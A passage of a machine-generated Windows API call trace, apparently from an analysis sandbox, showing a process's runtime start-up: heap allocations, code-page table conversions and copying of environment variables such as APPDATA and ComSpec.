(HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63af20 [0179.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x635568 [0179.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x640430 [0179.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63a888 [0179.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63af58 [0179.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x8c) returned 0x640490 [0179.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6407c0 | out: hHeap=0x620000) returned 1 [0179.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x640528 [0179.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x80) returned 0x640d30 [0180.034] GetLastError () returned 0x0 [0180.034] SetLastError (dwErrCode=0x0) [0180.035] GetLastError () returned 0x0 [0180.035] SetLastError (dwErrCode=0x0) [0180.035] GetLastError () returned 0x0 [0180.035] SetLastError (dwErrCode=0x0) [0180.035] GetACP () returned 0x4e4 [0180.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x220) returned 0x640db8 [0180.035] GetLastError () returned 0x0 [0180.035] SetLastError (dwErrCode=0x0) [0180.035] IsValidCodePage (CodePage=0x4e4) returned 1 [0180.035] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3ec | out: lpCPInfo=0x18f3ec) returned 1 [0180.041] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eeb4 | out: lpCPInfo=0x18eeb4) returned 1 [0180.049] GetLastError () returned 0x0 [0180.049] SetLastError (dwErrCode=0x0) [0180.049] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.056] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.056] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18eec8 | out: lpCharType=0x18eec8) returned 1 [0180.062] GetLastError () returned 0x0 [0180.062] SetLastError (dwErrCode=0x0) [0180.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.167] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0180.167] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e9f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0180.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f1c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ}\x11Êß\x04ô\x18", lpUsedDefaultChar=0x0) returned 256 [0180.167] GetLastError () returned 0x0 [0180.167] SetLastError (dwErrCode=0x0) [0180.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.167] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0180.167] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ea08, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0180.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f0c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ}\x11Êß\x04ô\x18", lpUsedDefaultChar=0x0) returned 256 [0180.178] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.178] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0180.230] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640d30) returned 0x80 [0180.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0180.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1f) returned 0x63ecb8 [0180.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x63ecb8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0180.249] GetLastError () returned 0x0 [0180.249] SetLastError (dwErrCode=0x0) [0180.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x641428 [0180.249] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641428) returned 0x4 [0180.249] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641428, Size=0x8) returned 0x641428 [0180.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0180.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x641438 [0180.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x641438, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0180.249] GetLastError () returned 0x0 [0180.249] SetLastError (dwErrCode=0x0) [0180.249] GetLastError () returned 0x0 [0180.249] SetLastError (dwErrCode=0x0) [0180.249] GetLastError () returned 0x0 [0180.249] SetLastError (dwErrCode=0x0) [0180.256] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641428) returned 0x8 [0180.256] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641428, Size=0xc) returned 0x641478 [0180.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0180.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x37) returned 0x641490 [0180.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x641490, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641478) returned 0xc [0180.256] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641478, Size=0x10) returned 0x641478 [0180.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0180.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x6355b0 [0180.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6355b0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641478) returned 0x10 [0180.257] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641478, Size=0x14) returned 0x6414d0 [0180.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0180.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x31) returned 0x6414f0 [0180.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6414f0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6414d0) returned 0x14 [0180.258] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414d0, Size=0x18) returned 0x6414d0 [0180.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x641530 [0180.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x641530, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6414d0) returned 0x18 [0180.259] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6414d0, Size=0x1c) returned 0x641550 [0180.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0180.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63a8b8 [0180.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x63a8b8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0180.259] 